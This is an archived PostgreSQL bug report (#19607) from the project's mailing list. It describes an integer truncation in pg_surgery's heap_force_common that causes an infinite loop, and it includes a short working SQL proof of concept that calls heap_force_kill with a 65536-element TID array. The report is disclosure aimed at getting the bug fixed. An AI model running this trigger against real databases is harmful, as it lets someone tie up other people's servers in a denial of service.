agora inbox for pgsql-bugs@postgresql.org
help / color / mirror / Atom feedFrom: PG Bug reporting form <noreply@postgresql.org>
To: pgsql-bugs@lists.postgresql.org
Cc: 1217816127@qq.com
Subject: BUG #19607: Bug 18: `pg_surgery` infinite loop in `heap_force_common`
Date: Mon, 03 Aug 2026 08:40:59 +0000
Message-ID: <19607-2f256a66481c514b@postgresql.org> (raw)
The following bug has been logged on the website:
Bug reference: 19607
Logged by: Yuelin Wang
Email address: 1217816127@qq.com
PostgreSQL version: 19beta2
Operating system: Linux (Ubuntu 24.04, x86_64)
Description:
### Summary
In `contrib/pg_surgery/heap_surgery.c`, a huge TID array can truncate an
index into `OffsetNumber`. The loop no longer reaches its end condition and
the statement keeps running until cancellation. This is a SQL reachable
denial of service when `pg_surgery` is installed.
### PoC
SQL script:
```sql
CREATE EXTENSION IF NOT EXISTS pg_surgery;
CREATE TABLE vuln_surgery_loop(a int);
INSERT INTO vuln_surgery_loop
SELECT g FROM generate_series(1, 300) AS g;
SET statement_timeout = '15s';
SELECT heap_force_kill(
'vuln_surgery_loop'::regclass,
ARRAY(
SELECT '(0,1)'::tid
FROM generate_series(1, 65536)
)
);
RESET statement_timeout;
```
### Result
The call remains active until `statement_timeout`. A finite array pass of
this size should complete quickly, so the timeout confirms the integer
truncation induced infinite loop.
view thread (5+ messages) latest in thread
Message-ID: <19607-2f256a66481c514b@postgresql.org>
Permalink: ../19607-2f256a66481c514b@postgresql.org/
Also on: postgresql.org/message-id/19607-2f256a66481c514b@postgresql.org
reply
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Reply to all the recipients using the --to and --cc options:
reply via email
To: pgsql-bugs@postgresql.org
Cc: noreply@postgresql.org, pgsql-bugs@lists.postgresql.org, 1217816127@qq.com
Subject: Re: BUG #19607: Bug 18: `pg_surgery` infinite loop in `heap_force_common`
In-Reply-To: <19607-2f256a66481c514b@postgresql.org>
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
This inbox is served by agora; see mirroring instructions
for how to clone and mirror all data and code used for this inbox